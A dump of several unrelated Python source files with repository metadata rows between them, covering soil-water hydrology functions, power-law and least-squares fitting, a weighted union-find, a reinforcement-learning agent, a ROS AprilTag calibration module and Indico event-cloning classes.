subrelwat = pcr.max(pcr.min((subwater / subfield), 1), 0)
rootrelwat = pcr.max(pcr.min((rootwater / rootfield), 1), 0)
caprise = pcr.min(subwater, capmax * (1 - rootrelwat) * subrelwat)
caprise = pcr.min(
caprise, rootsat - rootwater
) # adding caprise can not exceed saturated rootwater content
return caprise
# -Function to calculate percolation from subsoil (only if groundwater module is used)
def SubPercolation(pcr, subwater, subfield, subTT, gw, gwsat):
subperc = pcr.ifthenelse(
(gw < gwsat) & ((subwater - subfield) > 0),
(subwater - subfield) * (1 - pcr.exp(-1 / subTT)),
0,
)
return subperc
# -Function to calculate drainage from subsoil (only if groundwater module is NOT used)
def SubDrainage(pcr, subwater, subfield, subsat, drainvel, subdrainage, subTT):
subexcess = pcr.max(subwater - subfield, 0)
subexcessfrac = subexcess / (subsat - subfield)
sublateral = subexcessfrac * drainvel
subdrainage = (sublateral + subdrainage) * (1 - pcr.exp(-1 / subTT))
subdrainage = pcr.max(pcr.min(subdrainage, subwater), 0)
return subdrainage
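# --- Scalar illustration (sketch; not used by the model) ---
# The same capillary-rise rule as CapilRise, written with plain floats to
# make the arithmetic explicit: the rise is bounded by the available subsoil
# water, by capmax scaled with the two relative water contents, and by the
# remaining storage capacity of the root zone.
def capil_rise_scalar(subfield, subwater, capmax, rootwater, rootsat, rootfield):
    subrelwat = max(min(subwater / subfield, 1.0), 0.0)
    rootrelwat = max(min(rootwater / rootfield, 1.0), 0.0)
    caprise = min(subwater, capmax * (1.0 - rootrelwat) * subrelwat)
    return min(caprise, rootsat - rootwater)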
| 42.033333
| 87
| 0.684377
|
e181140acb8240d79762248b27716e5bbc667795
| 2,171
|
py
|
Python
|
metabolic_inefficiency/power_model.py
|
klarnemann/metabolic_inefficiency
|
3686497d99112b4f4a7e737247a42fa1f005c188
|
[
"MIT"
] | null | null | null |
metabolic_inefficiency/power_model.py
|
klarnemann/metabolic_inefficiency
|
3686497d99112b4f4a7e737247a42fa1f005c188
|
[
"MIT"
] | null | null | null |
metabolic_inefficiency/power_model.py
|
klarnemann/metabolic_inefficiency
|
3686497d99112b4f4a7e737247a42fa1f005c188
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.optimize import curve_fit
def power_func(x, a, p):
'''
Power function of x, given parameters a and p.
    Parameters
----------
x : numpy.ndarray, shape (n_voxels)
data
a : float
parameter
p : float
parameter'''
return a * x**p
def power_model(x_vars, y_vars, power_func):
'''Returns optimal parameters for power model of data.
x_vars : array-like, shape (n_voxels)
Training data
y_vars : array-like, shape (n_voxels)
Target values
power_func : function
Power function of x_vars, given a and p.'''
x_vars = np.array(x_vars, dtype=np.float64)
y_vars = np.array(y_vars, dtype=np.float64)
power_popt, _ = curve_fit(power_func, x_vars, y_vars)#fit power model
return power_popt
def leave_one_out_power_model(x_vars, y_vars, power_func=power_func, exclude_neighbors=True):
'''Iteratively runs power model, using a leave-one-subject-out approach.
x_vars : array-like, shape (n_voxels)
Training data
y_vars : array-like, shape (n_voxels)
Target values
power_func : function
Power function of x_vars, given a and p.
exclude_neighbors : bool
If true, exclude neighboring voxels from training data.'''
assert (len(x_vars) == len(y_vars)), 'Variables must have same length'
n_voxels = len(x_vars)
inds = np.arange(n_voxels)
# initiate output
loo_prediction = np.zeros(n_voxels)
loo_resid = np.zeros(n_voxels)
loo_a = np.zeros(n_voxels)
loo_p = np.zeros(n_voxels)
for i in np.arange(n_voxels):
if exclude_neighbors:
inds_mask = non_neighbor_mask(i)# remove to-be predicted voxel and its neighbors
else:
inds_mask = inds != i# remove to-be predicted voxel
        p_opt = power_model(np.asarray(x_vars)[inds_mask], np.asarray(y_vars)[inds_mask], power_func)# fit model on training data (held-out voxel excluded)
# get model parameters
loo_a[i] = p_opt[0]
loo_p[i] = p_opt[1]
loo_prediction[i] = power_func(x_vars[i], *p_opt)# predicted values
loo_resid[i] = y_vars[i] - loo_prediction[i]# residual error
return loo_prediction, loo_resid, loo_a, loo_p
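# --- Illustrative usage (sketch; synthetic data) ---
# Fit y = a * x**p on noiseless synthetic data generated with a=2, p=1.5.
# curve_fit should recover parameters close to those values.
def _demo_power_fit():
    x = np.linspace(1.0, 10.0, 50)
    y = 2.0 * x ** 1.5
    a_hat, p_hat = power_model(x, y, power_func)
    return a_hat, p_hat  # expected to be approximately (2.0, 1.5)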
| 34.460317
| 93
| 0.65638
|
682f18abc4565dfe0582a01e84ef5cdbe8156f8c
| 3,761
|
py
|
Python
|
snippets/graph/weighted_unionfind.py
|
KATO-Hiro/Somen-Soupy
|
d9a3f44a3f4ab1a491b8fb2ef151966cce4804b1
|
[
"CC0-1.0"
] | 1
|
2021-05-04T01:33:17.000Z
|
2021-05-04T01:33:17.000Z
|
snippets/graph/weighted_unionfind.py
|
KATO-Hiro/Somen-Soupy
|
d9a3f44a3f4ab1a491b8fb2ef151966cce4804b1
|
[
"CC0-1.0"
] | 113
|
2019-06-08T11:50:10.000Z
|
2022-03-24T04:49:55.000Z
|
snippets/graph/weighted_unionfind.py
|
KATO-Hiro/Somen-Soupy
|
d9a3f44a3f4ab1a491b8fb2ef151966cce4804b1
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Usage:
n, m = map(int, input().split())
uf = WeightedUnionFind(n)
for i in range(m):
li, ri, wi = map(int, input().split())
li -= 1
ri -= 1
uf.merge_if_needs(li, ri, wi)
"""
class WeightedUnionFind:
"""Represents a data structure that tracks a set of elements partitioned
into a number of disjoint (non-overlapping) subsets.
Landau notation: O(α(n)), where α(n) is the inverse Ackermann function.
See:
https://www.youtube.com/watch?v=zV3Ul2pA2Fw
https://en.wikipedia.org/wiki/Disjoint-set_data_structure
https://atcoder.jp/contests/abc120/submissions/4444942
https://qiita.com/drken/items/cce6fc5c579051e64fab
"""
def __init__(self, number_count: int):
"""
Args:
number_count: The size of elements (greater than 2).
"""
self.parent_numbers = [i for i in range(number_count)]
self.rank = [0 for _ in range(number_count)]
self.diff_weight = [0 for _ in range(number_count)]
def find_root(self, number: int) -> int:
"""Follows the chain of parent pointers from number up the tree until
it reaches a root element, whose parent is itself.
Args:
number: The trees id (0-index).
Returns:
The index of a root element.
"""
if self.parent_numbers[number] == number:
return number
else:
parent_number = self.parent_numbers[number]
root = self.find_root(parent_number)
self.diff_weight[number] += self.diff_weight[parent_number]
self.parent_numbers[number] = root
return root
def calc_weight(self, number: int) -> int:
"""Calculate the weight of the node.
Args:
number: The trees id (0-index).
Returns:
The weight of the node.
"""
self.find_root(number)
return self.diff_weight[number]
def is_same_group(self, number_x: int, number_y: int) -> bool:
"""Represents the roots of tree number_x and number_y are in the same
group.
Args:
number_x: The trees x (0-index).
number_y: The trees y (0-index).
"""
return self.find_root(number_x) == self.find_root(number_y)
def merge_if_needs(self, number_x: int, number_y: int, weight: int) -> bool:
"""Uses find_root to determine the roots of the tree number_x and
number_y belong to. If the roots are distinct, the trees are
combined by attaching the roots of one to the root of the other.
Args:
number_x: The trees x (0-index).
number_y: The trees y (0-index).
weight : Cost between nodes.
"""
# Correct the difference between the weight of root and number_x,
# number_y.
weight += self.calc_weight(number_x)
weight -= self.calc_weight(number_y)
root_x, root_y = self.find_root(number_x), self.find_root(number_y)
if root_x == root_y:
return False
if self.rank[root_x] < self.rank[root_y]:
root_x, root_y = root_y, root_x
weight = -weight
if self.rank[root_x] == self.rank[root_y]:
self.rank[root_x] += 1
self.parent_numbers[root_y] = root_x
self.diff_weight[root_y] = weight
return True
def calc_cost(self, from_x: int, to_y: int) -> int:
"""Calculate cost between nodes.
Args:
from_x: The trees x (0-index).
to_y : The trees y (0-index).
Returns:
Cost between nodes.
"""
return self.calc_weight(to_y) - self.calc_weight(from_x)
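# --- Illustrative usage (sketch) ---
# Node 1 is 5 units "heavier" than node 0 and node 2 is 3 units heavier
# than node 1, so the cost from node 0 to node 2 should be 8.
def _demo_weighted_union_find():
    uf = WeightedUnionFind(3)
    uf.merge_if_needs(0, 1, 5)
    uf.merge_if_needs(1, 2, 3)
    return uf.calc_cost(0, 2)  # expected: 8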
| 33.580357
| 80
| 0.590534
|
9525bd141fd910a98a1f323f383e54aaf40d5452
| 1,426
|
py
|
Python
|
hw4/hw4-code-Q2.py
|
kgarg8/cs559-uic-neural-networks
|
49ff812b0b6ecc4bbfc5151fb435c3c70c1a63b4
|
[
"MIT"
] | null | null | null |
hw4/hw4-code-Q2.py
|
kgarg8/cs559-uic-neural-networks
|
49ff812b0b6ecc4bbfc5151fb435c3c70c1a63b4
|
[
"MIT"
] | null | null | null |
hw4/hw4-code-Q2.py
|
kgarg8/cs559-uic-neural-networks
|
49ff812b0b6ecc4bbfc5151fb435c3c70c1a63b4
|
[
"MIT"
] | null | null | null |
import math, numpy as np, matplotlib.pyplot as plt
np.random.seed(111)
x = np.array([i+1 for i in range(50)])
u = np.random.uniform(-1, 1, 50)
y = np.array([u_i + i + 1 for i, u_i in enumerate(u)])
N = len(x)
sum_x = np.sum(x)
sum_y = np.sum(y)
sum_x_2 = np.sum([x_i**2 for x_i in x])
sum_x_y = np.sum([x_i*y_i for x_i, y_i in zip(x, y)])
# Linear least squares fit given by y = w1x + w0
w1 = (N*sum_x_y - sum_x*sum_y)/(N*sum_x_2 - sum_x**2)
w0 = (sum_y - w1*sum_x)/N
print(w1, w0)
# Plot
plt.figure()
plt.xlabel('x axis')
plt.ylabel('y axis')
plt.title('Linear Least Squares Fit')
plt.scatter(x, y)
plt.plot(x, w0 + w1 * x, 'r')
## Linear least squares fit using Gradient Descent
def gradient_function(w0, w1):
# Objective function = \sum_{i=1}{50} (y_i - w0 - w1*x_i)**2
pred = w0 + w1 * x
g_w0 = 2 * np.sum(pred - y)
g_w1 = 2 * (pred - y) @ x
return [g_w0, g_w1]
# initialize parameters
w0_i, w1_i = np.random.uniform(0, 1, 2)
w0_arr, w1_arr, E = [], [], []
iterations = 0; eta = 1e-5
w0 = w0_i; w1 = w1_i
# gradient descent loop
while iterations < 1000:
g = gradient_function(w0, w1)
w0 = w0 - eta * g[0]
w1 = w1 - eta * g[1]
iterations += 1
E.append(np.sum((y - w0 - w1*x)**2)) # Energy function
print(w1, w0)
# plot
plt.plot(x, w0 + w1 * x, 'g')
plt.legend(['Closed form solution', 'Gradient Descent', 'Actual Datapoints'])
plt.savefig('least_squares_fit.pdf')
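# Optional check (sketch, not part of the assignment output): np.polyfit with
# degree 1 solves the same least-squares problem and should agree closely with
# the closed-form solution printed above.
w1_check, w0_check = np.polyfit(x, y, 1)
print('polyfit check:', w1_check, w0_check)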
| 25.927273
| 77
| 0.61641
|
ecc52f66d38fd33512f18675798eca6e7b63a622
| 5,503
|
py
|
Python
|
control4/agents/nn_reactive_agent.py
|
sfpd/rlreloaded
|
650c64ec22ad45996c8c577d85b1a4f20aa1c692
|
[
"MIT"
] | null | null | null |
control4/agents/nn_reactive_agent.py
|
sfpd/rlreloaded
|
650c64ec22ad45996c8c577d85b1a4f20aa1c692
|
[
"MIT"
] | null | null | null |
control4/agents/nn_reactive_agent.py
|
sfpd/rlreloaded
|
650c64ec22ad45996c8c577d85b1a4f20aa1c692
|
[
"MIT"
] | null | null | null |
from control4.core.optimizable_agent import OptimizableAgent
from control4.core.cpd import DiagonalGaussian
from control4.config import floatX, resolve_cfg_loc
from control4.nn.nn import MLP
from control4.algs.alg_params import string2dict
import json, numpy as np
import theano,theano.tensor as TT #pylint: disable=F0401
class NNReactiveAgent(OptimizableAgent):
def __init__(self,mdp,policy_cfg, vf_cfg):
self._has_vf = vf_cfg is not None
pol_hid_sizes = policy_cfg.pop("hidden_layer_sizes",[25,25])
pol_nonlinearity = policy_cfg.pop("nonlinearity","soft_rect")
initial_stdev = policy_cfg.pop("initial_stdev", 0.5)
self.clip_features = policy_cfg.pop("clip_features",False)
self.clip_value = policy_cfg.pop("clip_value",5.0)
self.vf_scaling = policy_cfg.pop("vf_scaling",100.0)
if len(policy_cfg)>0:
print "WARNING: didn't use parameters %s"%policy_cfg.keys()
input_size = mdp.output_size("o")
n_net_out = mdp.input_size("u")
try:
lo,hi = mdp.obs_ranges()
except (NameError,NotImplementedError):
print "NNReactiveAgent: generating scaling data"
from control4.agents.gen_scaling_data import gen_scaling_data
lo,hi = gen_scaling_data(mdp)
lo -= 0.01 # TODO: Fix feature selection problem properly
hi += 0.01
input_trans = ((hi+lo)/2)[None,:]
input_scaling = ((hi-lo)/2)[None,:]
assert np.allclose( (np.array([lo,hi])- input_trans)/input_scaling,np.array([[-1],[1]]),atol=1e-3)
self.input_scaling = theano.shared(input_scaling,name="input_scaling")
self.input_trans = theano.shared(input_trans,name="input_trans")
self.input_scaling.type.broadcastable=(True,False)
self.input_trans.type.broadcastable=(True,False)
lo,hi = mdp.ctrl_bounds()
self.output_scaling = (hi-lo)/2
self.output_trans = (hi+lo)/2
assert np.allclose(self.output_scaling[None,:]*np.array([[-1],[1]])+self.output_trans[None,:],np.array([lo,hi]))
self._cpd = DiagonalGaussian( n_net_out )
self._input_info = {
"o" : mdp.output_info()["o"]
}
self._output_info = {
"a" : (n_net_out, floatX),
"b" : (n_net_out,floatX),
"q" : (None, floatX),
"u" : (n_net_out, floatX)
}
if self._has_vf: self._output_info["v"] = (None,floatX)
pol_n_hid = len(pol_hid_sizes)
init_col_norms = [1.0] * pol_n_hid + [0.01]
# Hidden layers
self.net = MLP([input_size] + pol_hid_sizes + [n_net_out],[pol_nonlinearity]*pol_n_hid + ["none"],
["input"] + ["hid%i"%i for i in xrange(pol_n_hid)] + ["output"],init_col_norms=init_col_norms)
if self._has_vf:
vf_hid_sizes = vf_cfg.pop("hidden_layer_sizes",[25,25])
vf_n_hid = len(vf_hid_sizes)
vf_nonlinearity = vf_cfg.pop("nonlinearity","soft_rect")
if len(vf_cfg)>0:
print "WARNING: didn't use parameters %s"%vf_cfg.keys()
init_col_norms = [1.0] * vf_n_hid + [0.01]
self.vf_net = MLP([input_size] + vf_hid_sizes + [1],[vf_nonlinearity]*vf_n_hid + ["none"],
["vfinput"] + ["vfhid%i"%i for i in xrange(vf_n_hid)] + ["vfoutput"],init_col_norms=init_col_norms)
stdev_init = np.ones(n_net_out,floatX)*initial_stdev
self.logstdev = theano.shared(np.log(stdev_init),name="logstdev")
OptimizableAgent.__init__(self,mdp)
def lag_array_names(self):
return []
def input_info(self):
return self._input_info
def output_info(self):
return self._output_info
def initialize_lag_arrays(self):
return {}
################################
def ponder(self, input_dict):
o = input_dict["o"]
o = (o - self.input_trans) / self.input_scaling
if self.clip_features:
o = o.clip(-self.clip_value, self.clip_value)
# std = TT.repeat(TT.exp(self.logstdev.reshape((1,-1))), o.shape[0], axis=0)
std = TT.exp(self.logstdev.reshape((1,-1))) + TT.zeros([o.shape[0],1],floatX)
out = {"a":TT.concatenate([self.net(o),std],axis=1)}
if self._has_vf:
out["v"] = self.vf_net(o)[:,0]*self.vf_scaling
return out
def cpd(self):
return self._cpd
def b2u(self,b_nb):
# because b[0] is in [0,1,2], but action.horiz is in [-1,0,1]
return b_nb*self.output_scaling + self.output_trans
def policy_vars(self):
return self.net.opt_vars() + [self.logstdev]
def vf_vars(self):
return self.vf_net.opt_vars() if self._has_vf else []
def extra_vars(self):
return self.net.extra_vars() + [self.input_scaling, self.input_trans]
def construct(params,mdp):
if params.get("policy_cfg"):
with open(resolve_cfg_loc(params["policy_cfg"]),"r") as fh:
policy_cfg = json.load(fh)
else:
policy_cfg = {}
policy_cfg.update(string2dict(params.get("policy_kws","")))
if params.get("vf_opt_mode") == "separate":
if params.get("vf_cfg"):
with open(resolve_cfg_loc(params["vf_cfg"]),"r") as fh:
vf_cfg = json.load(fh)
else:
vf_cfg = {}
vf_cfg.update(string2dict(params.get("vf_kws","")))
else:
vf_cfg = None
return NNReactiveAgent(mdp, policy_cfg, vf_cfg)
| 35.96732
| 120
| 0.612393
|
9cfa34015599bf366ed70c5d7f98ade4dbbe1c65
| 8,302
|
py
|
Python
|
interbotix_perception_toolbox/interbotix_perception_modules/src/interbotix_perception_modules/armtag.py
|
Drojas251/interbotix_ros_toolboxes
|
212d1fbdad4019dd628e029ef1a8493a04b795cb
|
[
"BSD-2-Clause"
] | 8
|
2021-08-24T15:27:33.000Z
|
2022-03-13T10:44:54.000Z
|
interbotix_perception_toolbox/interbotix_perception_modules/src/interbotix_perception_modules/armtag.py
|
Drojas251/interbotix_ros_toolboxes
|
212d1fbdad4019dd628e029ef1a8493a04b795cb
|
[
"BSD-2-Clause"
] | 4
|
2021-07-26T18:42:05.000Z
|
2022-02-15T17:23:18.000Z
|
interbotix_perception_toolbox/interbotix_perception_modules/src/interbotix_perception_modules/armtag.py
|
Drojas251/interbotix_ros_toolboxes
|
212d1fbdad4019dd628e029ef1a8493a04b795cb
|
[
"BSD-2-Clause"
] | 9
|
2021-06-03T08:12:04.000Z
|
2022-02-16T01:53:24.000Z
|
import rospy
import numpy as np
import tf2_ros
from geometry_msgs.msg import TransformStamped, Quaternion, Point
from tf.transformations import euler_from_quaternion, quaternion_from_euler
from interbotix_perception_modules.apriltag import InterbotixAprilTagInterface
from interbotix_common_modules import angle_manipulation as ang
### @brief A module to find an arm's base link frame relative to some reference frame (using the help of the AprilTag on the arm)
### @param armtag_ns - namespace where the ROS parameters needed by the module are located
### @param apriltag_ns - namespace where the ROS parameters needed by the InterbotixAprilTagInterface module are located
### @param init_node - whether or not the module should initialize a ROS node; set to False if a node was already initialized somewhere else
class InterbotixArmTagInterface(object):
def __init__(self, armtag_ns="armtag", apriltag_ns="apriltag", init_node=False):
if (init_node):
rospy.init_node(armtag_ns.strip("/") + "_interface")
self.arm_tag_frame = rospy.get_param("/" + armtag_ns + "/arm_tag_frame")
self.ref_frame = rospy.get_param("/" + armtag_ns + "/ref_frame")
self.arm_base_frame = rospy.get_param("/" + armtag_ns + "/arm_base_frame")
self.trans = TransformStamped()
self.trans.header.frame_id = self.ref_frame
self.trans.child_frame_id = self.arm_base_frame
self.trans.transform.rotation.w = 1.0
self.rpy = [0,0,0]
self.apriltag = InterbotixAprilTagInterface(apriltag_ns, False)
print("Initialized InterbotixArmTagInterface!\n")
### @brief Snaps an image of the AprilTag, then computes the transform of the robot's base_link frame w.r.t. the desired reference frame
### @param ref_frame - desired reference frame; defaults to self.ref_frame if not specified
### @param arm_base_frame - desired base_link frame (either the arm's actual base_link frame or a parent frame); defaults to self.arm_base_frame if not specified
### @param num_samples - number of AprilTag snapshots to take before averaging them to get a more accurate pose
### @param position_only - if True, only the x,y,z position of the snapped AR tag will be considered; if False, the orientation of the AR tag will be used as well
### @details - the 'position_only' parameter can only be set to True if there already exists a 'tf' path from the camera color frame to the AR tag frame on the arm;
### it can be used to try to get a more accurate position of the AR tag than what is dictated by the URDF
def find_ref_to_arm_base_transform(self, ref_frame=None, arm_base_frame=None, num_samples=5, position_only=False):
if ref_frame == None:
ref_frame = self.ref_frame
if arm_base_frame == None:
arm_base_frame = self.arm_base_frame
# take the average pose (w.r.t. the camera frame) of the AprilTag over 'num_samples' samples
point = Point()
rpy = [0, 0, 0]
for x in range(num_samples):
ps = self.apriltag.find_pose()
point.x += ps.position.x / float(num_samples)
point.y += ps.position.y / float(num_samples)
point.z += ps.position.z / float(num_samples)
quat_sample = ps.orientation
quat_list = [quat_sample.x, quat_sample.y, quat_sample.z, quat_sample.w]
rpy_sample = euler_from_quaternion(quat_list)
rpy[0] += rpy_sample[0] / float(num_samples)
rpy[1] += rpy_sample[1] / float(num_samples)
rpy[2] += rpy_sample[2] / float(num_samples)
T_CamTag = ang.poseToTransformationMatrix([point.x, point.y, point.z, rpy[0], rpy[1], rpy[2]])
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
# If position_only, set the orientation of the found AR tag to be equivalent to the orientation of the arm's AR tag as dictated by the URDF
if (position_only):
T_CamActualTag = self.get_transform(tfBuffer, self.apriltag.image_frame_id, self.arm_tag_frame)
T_CamTag[:3,:3] = T_CamActualTag[:3,:3]
# Now, get a snapshot of the pose of arm's base_link frame w.r.t. the AR tag link (as defined in the URDF - not the one found by the algorithm)
# We can't publish the AR tag pose found using the AprilTag algorithm to the /tf tree since ROS forbids a link to have multiple parents
T_TagBase = self.get_transform(tfBuffer, self.arm_tag_frame, arm_base_frame)
# Now, lets find the transform of the arm's base_link frame w.r.t. the reference frame
T_CamBase = np.dot(T_CamTag, T_TagBase)
if ref_frame == self.apriltag.image_frame_id:
T_RefBase = T_CamBase
else:
T_RefCam = self.get_transform(tfBuffer, ref_frame, self.apriltag.image_frame_id)
T_RefBase = np.dot(T_RefCam, T_CamBase)
# Now, we can publish the transform from the reference link to the arm's base_link legally as the arm's base_link has no parent
# (or even if it does, we can safely overwrite it since the 'tf' tree will remain intact)
self.rpy = ang.rotationMatrixToEulerAngles(T_RefBase[:3,:3])
quat = quaternion_from_euler(self.rpy[0], self.rpy[1], self.rpy[2])
self.trans = TransformStamped()
self.trans.transform.translation.x = T_RefBase[0,3]
self.trans.transform.translation.y = T_RefBase[1,3]
self.trans.transform.translation.z = T_RefBase[2,3]
self.trans.transform.rotation = Quaternion(quat[0], quat[1], quat[2], quat[3])
self.trans.header.frame_id = ref_frame
self.trans.child_frame_id = arm_base_frame
self.trans.header.stamp = rospy.Time.now()
self.apriltag.pub_transforms.publish(self.trans)
### @brief Helper function to lookup a transform and convert it into a 4x4 transformation matrix
### @param tfBuffer - tf2_ros buffer instance from which to lookup transforms from the 'tf' tree
### @param target_frame - the frame to which data should be transformed
### @param source_frame - the frame where the data originated
### @return T_TargetSource - desired 4x4 numpy transformation matrix
def get_transform(self, tfBuffer, target_frame, source_frame):
try:
trans = tfBuffer.lookup_transform(target_frame, source_frame, rospy.Time(0), rospy.Duration(4.0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.logerr("Failed to look up the transform from '%s' to '%s'." % (target_frame, source_frame))
return np.identity(4)
x = trans.transform.translation.x
y = trans.transform.translation.y
z = trans.transform.translation.z
quat = trans.transform.rotation
quat_list = [quat.x, quat.y, quat.z, quat.w]
rpy = euler_from_quaternion(quat_list)
T_TargetSource = ang.poseToTransformationMatrix([x, y, z, rpy[0], rpy[1], rpy[2]])
return T_TargetSource
### @brief Get the 'x' component of T_RefBase
### @return 'x' [m]
def get_x(self):
return self.trans.transform.translation.x
### @brief Get the 'y' component of T_RefBase
### @return 'y' [m]
def get_y(self):
return self.trans.transform.translation.y
### @brief Get the 'z' component of T_RefBase
### @return 'z' [m]
def get_z(self):
return self.trans.transform.translation.z
### @brief Get the 'roll' component of T_RefBase
### @return 'roll' [rad]
def get_roll(self):
return self.rpy[0]
### @brief Get the 'pitch' component of T_RefBase
### @return 'pitch' [rad]
def get_pitch(self):
return self.rpy[1]
### @brief Get the 'yaw' component of T_RefBase
### @return 'yaw' [rad]
def get_yaw(self):
return self.rpy[2]
### @brief Get the parent frame of T_RefBase (usually something like 'camera_color_optical_frame')
### @return 'frame_id'
def get_parent_frame(self):
return self.trans.header.frame_id
### @brief Get the child frame of T_RefBase (usually something like 'base_link')
### @return 'child_frame_id'
def get_child_frame(self):
return self.trans.child_frame_id
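### Illustrative usage (sketch; not part of the original module). Requires a
### running ROS master with the 'armtag'/'apriltag' parameters loaded and the
### relevant camera/AprilTag nodes active.
if __name__ == '__main__':
    armtag = InterbotixArmTagInterface(init_node=True)
    armtag.find_ref_to_arm_base_transform(num_samples=5)
    print(armtag.get_x(), armtag.get_y(), armtag.get_z())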
| 55.346667
| 168
| 0.68622
|
d96c5c6a520004d9115a8d13381eb14b7cc10b52
| 6,134
|
py
|
Python
|
indico/modules/events/clone.py
|
EdverCompany/indico
|
c4b5e7b2e3a47355d850a342ed527c09334ef336
|
[
"MIT"
] | null | null | null |
indico/modules/events/clone.py
|
EdverCompany/indico
|
c4b5e7b2e3a47355d850a342ed527c09334ef336
|
[
"MIT"
] | 2
|
2021-05-26T09:16:52.000Z
|
2021-05-26T09:28:59.000Z
|
indico/modules/events/clone.py
|
andrea-guarino-sonarsource/indico
|
2dada1f293daea913dec85ebb33c29a9f2cb92ac
|
[
"MIT"
] | null | null | null |
# This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.core.db import db
from indico.core.db.sqlalchemy.principals import clone_principals
from indico.core.db.sqlalchemy.util.models import get_simple_column_attrs
from indico.modules.events.cloning import EventCloner
from indico.modules.events.models.events import EventType
from indico.modules.events.models.persons import EventPerson, EventPersonLink
from indico.modules.events.models.principals import EventPrincipal
from indico.modules.events.sessions import session_settings
from indico.modules.events.util import track_location_changes
from indico.util.i18n import _
class EventLocationCloner(EventCloner):
name = 'event_location'
friendly_name = _('Venue/Room')
is_default = True
@property
def is_available(self):
return self._has_content(self.old_event)
def has_conflicts(self, target_event):
return self._has_content(target_event)
def run(self, new_event, cloners, shared_data, event_exists=False):
with db.session.no_autoflush:
self._clone_location(new_event)
db.session.flush()
def _has_content(self, event):
return event.has_location_info
def _clone_location(self, new_event):
with track_location_changes():
new_event.location_data = self.old_event.location_data
db.session.flush()
class EventPersonCloner(EventCloner):
name = 'event_persons'
friendly_name = _('Persons')
is_internal = True
is_default = True
# We do not override `is_available` as we have cloners depending
# on this internal cloner even if it won't clone anything.
def has_conflicts(self, target_event):
return target_event.persons.has_rows()
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = {}
with db.session.no_autoflush:
self._clone_persons(new_event)
db.session.flush()
return {'person_map': self._person_map}
def _clone_persons(self, new_event):
attrs = get_simple_column_attrs(EventPerson) | {'user'}
for old_person in self.old_event.persons:
person = EventPerson(event=new_event)
person.populate_from_attrs(old_person, attrs)
assert person not in db.session
self._person_map[old_person] = person
class EventPersonLinkCloner(EventCloner):
name = 'event_person_links'
requires = {'event_persons'}
is_default = True
@property
def friendly_name(self):
if self.old_event.type_ == EventType.lecture:
return _('Speakers')
else:
return _('Chairpersons')
@property
def is_available(self):
return self._has_content(self.old_event)
def has_conflicts(self, target_event):
return self._has_content(target_event)
def run(self, new_event, cloners, shared_data, event_exists=False):
self._person_map = shared_data['event_persons']['person_map']
with db.session.no_autoflush:
self._clone_person_links(new_event)
db.session.flush()
def _has_content(self, event):
return bool(event.person_links)
def _clone_person_links(self, new_event):
attrs = get_simple_column_attrs(EventPersonLink)
for old_link in self.old_event.person_links:
link = EventPersonLink()
link.populate_from_attrs(old_link, attrs)
link.person = self._person_map[old_link.person]
new_event.person_links.append(link)
class EventProtectionCloner(EventCloner):
name = 'event_protection'
friendly_name = _('ACLs and protection settings')
is_default = True
uses = {'event_roles', 'registration_forms'}
def has_conflicts(self, target_event):
if target_event.access_key != '':
return True
entries = list(target_event.acl_entries)
return len(entries) != 1 or entries[0].user != target_event.creator
def run(self, new_event, cloners, shared_data, event_exists=False):
self._event_role_map = shared_data['event_roles']['event_role_map'] if 'event_roles' in cloners else None
self._regform_map = shared_data['registration_forms']['form_map'] if 'registration_forms' in cloners else None
with db.session.no_autoflush:
self._clone_protection(new_event)
self._clone_session_coordinator_privs(new_event)
self._clone_acl(new_event, event_exists)
self._clone_visibility(new_event)
db.session.flush()
def _clone_protection(self, new_event):
new_event.protection_mode = self.old_event.protection_mode
new_event.access_key = self.old_event.access_key
def _clone_visibility(self, new_event):
new_event.visibility = self.old_event.visibility if new_event.category == self.old_event.category else None
def _clone_session_coordinator_privs(self, new_event):
session_settings_data = session_settings.get_all(self.old_event)
session_settings.set_multi(new_event, {
'coordinators_manage_contributions': session_settings_data['coordinators_manage_contributions'],
'coordinators_manage_blocks': session_settings_data['coordinators_manage_blocks']
})
def _clone_acl(self, new_event, event_exists):
if event_exists:
acl_entries = {principal for principal in self.old_event.acl_entries if principal.user != new_event.creator}
new_event.acl_entries = clone_principals(EventPrincipal, acl_entries,
self._event_role_map, self._regform_map)
db.session.flush()
new_event.update_principal(new_event.creator, full_access=True)
else:
new_event.acl_entries = clone_principals(EventPrincipal, self.old_event.acl_entries,
self._event_role_map, self._regform_map)
| 39.070064
| 120
| 0.69987
|
f6f9acfae489f2b0b4a03d4bb3c8af5c67f1dc6b
| 192
|
py
|
Python
|
AtCoder/ABC/000-159/ABC141_D.py
|
sireline/PyCode
|
8578467710c3c1faa89499f5d732507f5d9a584c
|
[
"MIT"
] | null | null | null |
AtCoder/ABC/000-159/ABC141_D.py
|
sireline/PyCode
|
8578467710c3c1faa89499f5d732507f5d9a584c
|
[
"MIT"
] | null | null | null |
AtCoder/ABC/000-159/ABC141_D.py
|
sireline/PyCode
|
8578467710c3c1faa89499f5d732507f5d9a584c
|
[
"MIT"
] | null | null | null |
import heapq
N, M = [int(n) for n in input().split()]
A = [-int(n) for n in input().split()]
heapq.heapify(A)
[heapq.heappush(A, -(-heapq.heappop(A)//2)) for _ in range(M)]
print(-sum(A))
| 24
| 65
| 0.604167
|
64f94e1659da4c216d9a6dad359ca083622c1b80
| 2,660
|
py
|
Python
|
import/dataframe_helpers.py
|
flywheel-apps/flywheel-tutorials
|
7fc6ac9bb262573584260beaa83506eb1c5d8b58
|
[
"MIT"
] | null | null | null |
import/dataframe_helpers.py
|
flywheel-apps/flywheel-tutorials
|
7fc6ac9bb262573584260beaa83506eb1c5d8b58
|
[
"MIT"
] | null | null | null |
import/dataframe_helpers.py
|
flywheel-apps/flywheel-tutorials
|
7fc6ac9bb262573584260beaa83506eb1c5d8b58
|
[
"MIT"
] | null | null | null |
"""
Various functions to facilitate the cleaning and formatting of pandas dataframes.
This may be expanded as the need arises.
"""
import copy
import datetime
import logging
import numpy as np
log = logging.getLogger(__name__)
def convert_time_to_seconds(time_span, scale):
"""
Convert arbitrary time span to seconds.
On failure, returns 0 seconds.
Args:
time_span (str): The length of time specified by units "scale".
